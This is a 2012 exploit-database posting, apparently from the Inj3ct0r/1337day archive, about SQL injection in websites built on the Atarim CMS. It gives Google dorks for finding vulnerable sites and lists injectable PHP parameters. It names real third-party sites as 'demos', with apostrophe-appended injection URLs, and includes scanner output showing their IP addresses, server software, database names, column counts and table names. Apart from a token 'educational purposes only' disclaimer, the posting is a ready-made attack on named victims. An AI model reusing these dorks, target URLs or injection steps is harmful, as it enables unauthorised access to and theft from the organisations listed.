Home / exploitsPDF  

Atarim SQL Injection

Posted on 13 October 2012

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm TUNISIAN CYBER member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 [+] Author: TUNISIAN CYBER [+] Home: 1337day.com Inj3ct0r Exploit DataBase [+] Exploit Title: Atarim SQL Injection Vulnerability [+] Date: 11-10-2012 [+] Category: WebApp [+] Google Dork: intext:"design:atarim" .php?id= intext:"design:atarim" .php?cat= [+] Tested on: Windows 7 Professionnel [+] Vendor: http://www.atarim.com/ [+] Twitter: @a0a0a5 #################################################################################### ################################################################################# ||| ~~ Use It At Your Own Risk ~~ ||| ||| It's For Educational Purpos Only ||| ||| I'm not Responsible For Any Damage ||| ################################################################################# Vulnerability Description: SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks. The impact of this vulnerability: A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. ============================== Vulnerabilities: 127.0.0.1/location.php?id=[SQL] 127.0.0.1/page.php?page= 127.0.0.1/gallery.php?cat= 127.0.0.1/article.php?id= 127.0.0.1/list.php?categ= ============================== Demos: http://www.locationisrael.com/location.php?id=2%22' http://www.shuvu.org.il/page.php?page=9' http://www.danielcohen.co.il/gallery.php?cat=3' http://www.hamodia.fr/article.php?id=3366%C2%A0' http://www.magink.com/page.php?id=38' http://www.yair-technologies.com/list.php?categ=19' http://www.dcinvest.co.il/page.php?page=1' http://drafts.atarim.com/easyshabat/list.php?cat=4' in google you'll find more Examples of 3xpl01t1ng: +-------------------------------------+ Analyzing http://drafts.atarim.com/easyshabat/list.php?cat=4' Host IP: 66.225.246.222 Web Server: Apache Powered-by: PHP/5.2.14 DB Server: MySQL Selected Column Count is 2 Finding string column Valid String Column is 1 Target Vulnerable :D Current DB: nicha_nichabess +-------------------------------------+ +-------------------------------------+ Analyzing http://www.magink.com/page.php?id=38' Host IP: 216.246.55.247 Web Server: Apache Powered-by: PHP/5.2.14 Keyword Found: mysql_result(): DB Server: MySQL Selected Column Count is 13 Finding string column Valid String Column is 2 Target Vulnerable :D Current DB: maginka_magink +-------------------------------------+ +-------------------------------------+ Analyzing http://www.shuvu.org.il/page.php?page=9' Host IP: 75.102.20.239 Web Server: Apache Powered-by: PHP/5.2.14 Keyword Found: mysql_result(): DB Server: MySQL Selected Column Count is 4 Finding string column Valid String Column is 4 Target Vulnerable :D Current DB: edshuvu_shuvoux +-------------------------------------+ +--------------------+ Table Name Columns team schools pages news kind gallery galleries faq city +--------------------+ +----------------------------------------------------->THNX T0<------------------------------------------------------------------+ TN H4CK3RZ( Badi - xMax-tn - Silent_hill - | pipo issam - anas laribi - xtech set) , | r00tw0rm members and Inj3ct0r Team: | r0073r | Sid3^effects | r4dc0re | CrosS | SeeMe | anT!-Tr0J4n | KedAns-Dz | DaOne | Angel Injection | NuxbieCyber | Sammy FORGIT | Taurus Omar | +-----------------------------------------------------><-------------------------------------------------------------------------+ ./3nD

 

TOP